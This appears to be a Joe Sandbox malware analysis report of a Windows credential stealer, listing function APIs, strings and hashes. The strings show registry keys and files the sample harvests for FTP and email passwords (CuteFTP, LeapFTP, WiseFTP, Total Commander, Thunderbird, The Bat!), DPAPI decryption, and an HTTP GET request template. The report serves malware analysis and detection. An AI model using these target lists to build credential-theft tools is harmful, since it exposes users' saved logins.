Instruction Fuzzy Hash: C041C43184011CBADF216B61CD42BDD7ABABF44304F50C1BAB549740B1DBBA5BA1AF88

Function 00403A40 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 112networkstringCOMMON

Download Yara Rule

APIs

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403AAC
InternetCreateUrlA.WININET(0000003C,80000000,?,00001FFF), ref: 00403AD7
InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403B1D
wsprintfA.USER32 ref: 00403B3C
lstrlenA.KERNEL32(?,00002000,00002000), ref: 00403B5F
closesocket.WSOCK32(?,?,00002000,00002000), ref: 00403B89

Strings

<, xrefs: 00403AF7
GET %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403B34

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: Internet$Crack$AllocCreateLocalclosesocketlstrlenwsprintf
String ID: <$GET %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
API String ID: 4072649068-555445111
Opcode ID: d60a0399014c81d479f1bf6e8654dda4f2a395ae147f4dd14fe526620edc93ee
Instruction ID: 5dad31a296ee1e474bb90fa989d9bf74c8b3c06fe6408c1587e28e125fac8998
Opcode Fuzzy Hash: d60a0399014c81d479f1bf6e8654dda4f2a395ae147f4dd14fe526620edc93ee
Instruction Fuzzy Hash: C041E871D00209EAEF11AFA1CC41FEDBEBAEF04349F10413AF500B52A1D7B96A52DB59

Function 0040D3EB Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 108registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040D401
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D435
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D5B8

Strings

User, xrefs: 0040D48B
Remote Dir, xrefs: 0040D4E5
Pass, xrefs: 0040D4A9
Host, xrefs: 0040D46D
Port, xrefs: 0040D4C7

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$Pass$Port$Remote Dir$User
API String ID: 1332880857-1775099961
Opcode ID: adb44f60b2537b44978af1d702f16a5e9d64284102b915f63713a2386231933b
Instruction ID: 826acad57edaa0bf4c2fa88e94753e9669362c91b49d7790f3552c75a3286d91
Opcode Fuzzy Hash: adb44f60b2537b44978af1d702f16a5e9d64284102b915f63713a2386231933b
Instruction Fuzzy Hash: 2B41C471840118BADF226F61CD42FDD7AB6BF04308F50C1BAB548740B1DB7A5B91AF98

Function 0040C64E Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 101COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(0084DAA8,BlazeFtp), ref: 0040C675

Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

LastPort, xrefs: 0040C71F
Software\FlashPeak\BlazeFtp\Settings, xrefs: 0040C6D4, 0040C6EE, 0040C708, 0040C724
LastUser, xrefs: 0040C703
BlazeFtp, xrefs: 0040C66F
site.dat, xrefs: 0040C690, 0040C6BB
LastPassword, xrefs: 0040C6CF
LastAddress, xrefs: 0040C6E9
\BlazeFtp, xrefs: 0040C6C0

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: BlazeFtp$LastAddress$LastPassword$LastPort$LastUser$Software\FlashPeak\BlazeFtp\Settings$\BlazeFtp$site.dat
API String ID: 1884169789-2976447346
Opcode ID: 07c908085ae0a3b1dd2a0e79e3ba6bee56b4ce9844fc876ef30fd9faf67731fa
Instruction ID: 9788eed68af0fdd9333d675305e002c21cac9e36ea6adcdc8056509605193707
Opcode Fuzzy Hash: 07c908085ae0a3b1dd2a0e79e3ba6bee56b4ce9844fc876ef30fd9faf67731fa
Instruction Fuzzy Hash: 82310931940109BADF126FA1CC82FEE7A72AF41748F60413BB510751F1DBBE9A919B4C

Function 00405204 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 69COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(0084DAA8,CUTEFTP), ref: 0040522B

Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar, xrefs: 00405295
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar, xrefs: 004052C9
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar, xrefs: 004052BC
\sm.dat, xrefs: 0040523F
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar, xrefs: 004052A2
CUTEFTP, xrefs: 00405225
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar, xrefs: 004052AF
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar, xrefs: 00405288

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: CUTEFTP$Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar$\sm.dat
API String ID: 1884169789-2738976122
Opcode ID: e10679da0e968ae51e2c90e9b0e9e9967d907165e8569cbaf05ea9d011917a38
Instruction ID: 5ef3d90ed464d92e4ce4a3c155051f2a51152499df9d1fdfddb0812c96e0ae3a
Opcode Fuzzy Hash: e10679da0e968ae51e2c90e9b0e9e9967d907165e8569cbaf05ea9d011917a38
Instruction Fuzzy Hash: C5115E71644509BADF113F21CC02FDE3E22AF94784F10403ABA05791E2DBBD8AA19E4C

Function 004038B9 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 134stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

StrStrIA.SHLWAPI(?,Content-Length:), ref: 00403941
lstrlenA.KERNEL32(Content-Length:,00000000,?,Content-Length:), ref: 00403952
StrToIntA.SHLWAPI(00000001,00000001,00000000,Content-Length:,00000000,?,Content-Length:), ref: 00403973
StrStrIA.SHLWAPI(?,Location:,?,Content-Length:), ref: 0040398A
lstrlenA.KERNEL32(Location:,00000000,?,Location:,?,Content-Length:), ref: 0040399B

Strings

Location:, xrefs: 00403982, 00403996
Content-Length:, xrefs: 00403939, 0040394D

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocLocal
String ID: Content-Length:$Location:
API String ID: 2140729754-2400408565
Opcode ID: d8122c238ad3931d07f7d45422bcd0d6ba05ce70cd545abab15ebe5caa2b8043
Instruction ID: 53c0aedc88992e642676fe9e6f7d5ee89e7a3e391c4de06073f3904886dd738f
Opcode Fuzzy Hash: d8122c238ad3931d07f7d45422bcd0d6ba05ce70cd545abab15ebe5caa2b8043
Instruction Fuzzy Hash: C841B435F00149BBDB10AFA5DC41B9EFF69EF81308F208177B410B62E1DBB98A519B58

Function 00406B89 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 121registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00406B9F
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406BD3
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406D74

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

Username, xrefs: 00406C4C
Password, xrefs: 00406C10
Hostname, xrefs: 00406C2E
Port, xrefs: 00406C6F

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseEnumFreeLocalOpen
String ID: Hostname$Password$Port$Username
API String ID: 3369285772-1811172798
Opcode ID: 36d22202374298f3ff259b9d53ff544a628b235b0e540339258e70ff1ed1119d
Instruction ID: 99001fdd8753383694019c6dd6a93260e170fc207c11c2d7306dae9c04af7e76
Opcode Fuzzy Hash: 36d22202374298f3ff259b9d53ff544a628b235b0e540339258e70ff1ed1119d
Instruction Fuzzy Hash: 7B41077194011CFADF21AB61CC42BDD7AB9BF04344F54C0BAB189740B1DB7A5BA19F98

Function 00406955 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 110registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040696B
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040699F
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406B14

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

Password, xrefs: 004069D7
FtpPort, xrefs: 00406A36
Server, xrefs: 004069F5
Username, xrefs: 00406A13

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseEnumFreeLocalOpen
String ID: FtpPort$Password$Server$Username
API String ID: 3369285772-1828875246
Opcode ID: 819fc5c6edb7c21088c55d04b07920460cbc523b03429d021ac959f3d17d89b0
Instruction ID: 35153dfd5480a7f2773a935d7fa12b4e763ec81b3f01874c9c19303a63a540c2
Opcode Fuzzy Hash: 819fc5c6edb7c21088c55d04b07920460cbc523b03429d021ac959f3d17d89b0
Instruction Fuzzy Hash: F541F67190011CBADF217B61CC42BDD7AB9BF44304F50C1BAB149740B1DABA5BA19F98

Function 0040E062 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 97registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E072
RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?,?,?), ref: 0040E1A2

Part of subcall function 0040421D: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404269
Part of subcall function 0040421D: LocalFree.KERNEL32(00000000), ref: 0040429D

Part of subcall function 004015B3: lstrlenA.KERNEL32(00000000), ref: 004015BF

Strings

Port, xrefs: 0040E0C2
Folder, xrefs: 0040E0D7
Site, xrefs: 0040E081
UserID, xrefs: 0040E096
xflags, xrefs: 0040E0AD

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseCryptDataFreeLocalOpenUnprotectlstrlen
String ID: Folder$Port$Site$UserID$xflags
API String ID: 2167297517-269738940
Opcode ID: 628222a205af700e1dfa5e459dd2762fba81473f5a09891019813ca48e3e76f8
Instruction ID: acf25d5f465c55af7625b09366b2c78d2ad704e718143cf7d072450bde636533
Opcode Fuzzy Hash: 628222a205af700e1dfa5e459dd2762fba81473f5a09891019813ca48e3e76f8
Instruction Fuzzy Hash: 7831A235800109BADF126F92CC42FEE7B76AF04704F50853BB554781F1D7BA9AA1EB48

Function 00407702 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407715
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407749
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407864

Strings

InstallPath, xrefs: 00407781
DataDir, xrefs: 0040779C
sites.dat, xrefs: 004077C3, 004077FC
sites.ini, xrefs: 004077DB, 00407814

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DataDir$InstallPath$sites.dat$sites.ini
API String ID: 1332880857-3870687875
Opcode ID: a177c6cfb3178f946141ffd0db5cdd65dca207f9c3fb13970eb39b1fee972048
Instruction ID: bd6502dbd2f434c65abe7692706a4c0e090c52a5a12b12d90e4d834c171b6782
Opcode Fuzzy Hash: a177c6cfb3178f946141ffd0db5cdd65dca207f9c3fb13970eb39b1fee972048
Instruction Fuzzy Hash: 2331053184021CFADF216F51CC46BDD7ABABF40344F50C4BAB248751A1DBB96AD19F89

Function 0040F64A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 53COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040F678

Part of subcall function 00409A76: StrStrIA.SHLWAPI(?,?), ref: 00409A82
Part of subcall function 00409A76: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409AF9
Part of subcall function 00409A76: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B25
Part of subcall function 00409A76: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B6D

SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040F6BD
GetCurrentDirectoryA.KERNEL32(00000104,?,?,?), ref: 0040F6D8
SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 0040F71D

Strings

\Thunderbird, xrefs: 0040F67D, 0040F69A, 0040F6DD, 0040F6FA
Thunderbird, xrefs: 0040F682, 0040F69F, 0040F6E2, 0040F6FF
Software\Mozilla, xrefs: 0040F687, 0040F6A4, 0040F6E7, 0040F704

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Software\Mozilla$Thunderbird$\Thunderbird
API String ID: 3062143572-138716004
Opcode ID: dee2d00840e4c69ac92f84b52ac7d8150928e46feabd8bc2b351fb67c65ae42e
Instruction ID: bd4aa642c6eb53d7b9c00ec68b8433f5a3b9b95189823f5fba1e955bc3a480ca
Opcode Fuzzy Hash: dee2d00840e4c69ac92f84b52ac7d8150928e46feabd8bc2b351fb67c65ae42e
Instruction Fuzzy Hash: 8A11EF70784218BEDB11AB62CC87FD97A759B40708F60C0A6B648750E3DBBDCAD19B4D

Function 004078B9 Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 100stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(0084DAA8,unleap.exe), ref: 004078EB
lstrlenA.KERNEL32(unleap.exe,00000001,0084DAA8,unleap.exe), ref: 00407904

Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

StrStrIA.SHLWAPI(00849868,leapftp,0084DAA8,unleap.exe), ref: 00407948

Strings

leapftp, xrefs: 00407942
sites.dat, xrefs: 00407919, 0040795E
SOFTWARE\LeapWare, xrefs: 004079BE, 004079D1
sites.ini, xrefs: 0040792D, 00407972
unleap.exe, xrefs: 004078E5, 004078FF

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: SOFTWARE\LeapWare$leapftp$sites.dat$sites.ini$unleap.exe
API String ID: 1884169789-1497043051
Opcode ID: 0bd7889019541237edf07f4bd8fd4bcd8c91632b2d1955a5437dfcf88fff1b7d
Instruction ID: 587d092347e02f9e7962a8cbc65e01c2016c5b541c46329675d4887270a6c82e
Opcode Fuzzy Hash: 0bd7889019541237edf07f4bd8fd4bcd8c91632b2d1955a5437dfcf88fff1b7d
Instruction Fuzzy Hash: FC21A2B1644204BDFB123B71CC06FEA3E1AAB81354F20853BB905B51E2E7BC5D9196AD

Function 0040ED97 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

wsprintfA.USER32 ref: 0040EE6C

Strings

Working Directory, xrefs: 0040ED9F
Software\RIT\The Bat!, xrefs: 0040EDA4, 0040EDD2
Count, xrefs: 0040EE2B
Default, xrefs: 0040EDFB
Software\RIT\The Bat!\Users depot, xrefs: 0040EE00, 0040EE30, 0040EE7C
ProgramDir, xrefs: 0040EDCD
Dir #%d, xrefs: 0040EE63

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: FreeLocalwsprintf
String ID: Count$Default$Dir #%d$ProgramDir$Software\RIT\The Bat!$Software\RIT\The Bat!\Users depot$Working Directory
API String ID: 988369812-1921698578
Opcode ID: bd5cfd4729ccf78e2b14c8987cec553748ba070bc45ee8b3e31b11adccab183c
Instruction ID: e750723d76c73536ddc8d51081a3667551c4aa25361badb92b68cc5b625c7140
Opcode Fuzzy Hash: bd5cfd4729ccf78e2b14c8987cec553748ba070bc45ee8b3e31b11adccab183c
Instruction Fuzzy Hash: EB31D635D0020DFADF11ABA2DC42A9E7B76AF04344F60897BB414B51E1D7B99B60AA48

Function 00404A92 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

GetWindowsDirectoryA.KERNEL32(?,00000104,00000105), ref: 00404ABC

Strings

Software\Ghisler\Total Commander, xrefs: 00404BA6, 00404BC6, 00404C46, 00404C65
InstallDir, xrefs: 00404B50, 00404BA1, 00404BF2, 00404C41
\GHISLER, xrefs: 00404AFC, 00404B1B, 00404B3A
Software\Ghisler\Windows Commander, xrefs: 00404B55, 00404B75, 00404BF7, 00404C16
FtpIniName, xrefs: 00404B70, 00404BC1, 00404C11, 00404C60

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: AllocDirectoryLocalWindows
String ID: FtpIniName$InstallDir$Software\Ghisler\Total Commander$Software\Ghisler\Windows Commander$\GHISLER
API String ID: 3186838798-3636168975
Opcode ID: f98ef943dc5ecdf4fe6de66f6584d2e8d300c6dc30459f4818816504d7116737
Instruction ID: e12406a4063c388e426f80d96e1c55e83aebae4117be8ddaeedfdc1085b672af
Opcode Fuzzy Hash: f98ef943dc5ecdf4fe6de66f6584d2e8d300c6dc30459f4818816504d7116737
Instruction Fuzzy Hash: 9D41CDB1A80605BAEF123B71CC43FDE7E259F80754F20417B7A14B40F6DABD9A509A5C

Function 0040475C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00404772
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004047A6
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004048CD

Strings

HostName, xrefs: 004047FC
User, xrefs: 0040481A
Password, xrefs: 004047DE

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: HostName$Password$User
API String ID: 1332880857-1253078594
Opcode ID: a9edcef85e703cf29bd117596f725d26320b9b8c2277babcdd567046530c79ac
Instruction ID: db40dad78a2ba0b83d513b2a7ff2eedcfb1ea977825c3c17440cf38f82ee02d9
Opcode Fuzzy Hash: a9edcef85e703cf29bd117596f725d26320b9b8c2277babcdd567046530c79ac
Instruction Fuzzy Hash: A631E57184011CBADF227B61CC42BDD7AB9BF40304F50C5BAB648740B1CBB95B929F88

Function 00408C47 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408C5A
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408C8E
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408D80

Strings

wiseftp.ini, xrefs: 00408D1E
wiseftpsrvs.ini, xrefs: 00408D06
wiseftpsrvs.bin, xrefs: 00408D36

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: wiseftp.ini$wiseftpsrvs.bin$wiseftpsrvs.ini
API String ID: 1332880857-3184955129
Opcode ID: 4701b45774f992d88d65b4443a3adb1511bb1d8421c0b81ddb5c335998bbd9a2
Instruction ID: 9a22b476d29900e44ea1d58df917a9250a7719ae7ca8e7b5c489c9b18f449501
Opcode Fuzzy Hash: 4701b45774f992d88d65b4443a3adb1511bb1d8421c0b81ddb5c335998bbd9a2
Instruction Fuzzy Hash: 9031E77190010CBADF216F61CD42FDD7ABABF10344F50C4BAB548B40E1DE799A91AF98

Function 00409C05 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409C62
SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409CA7

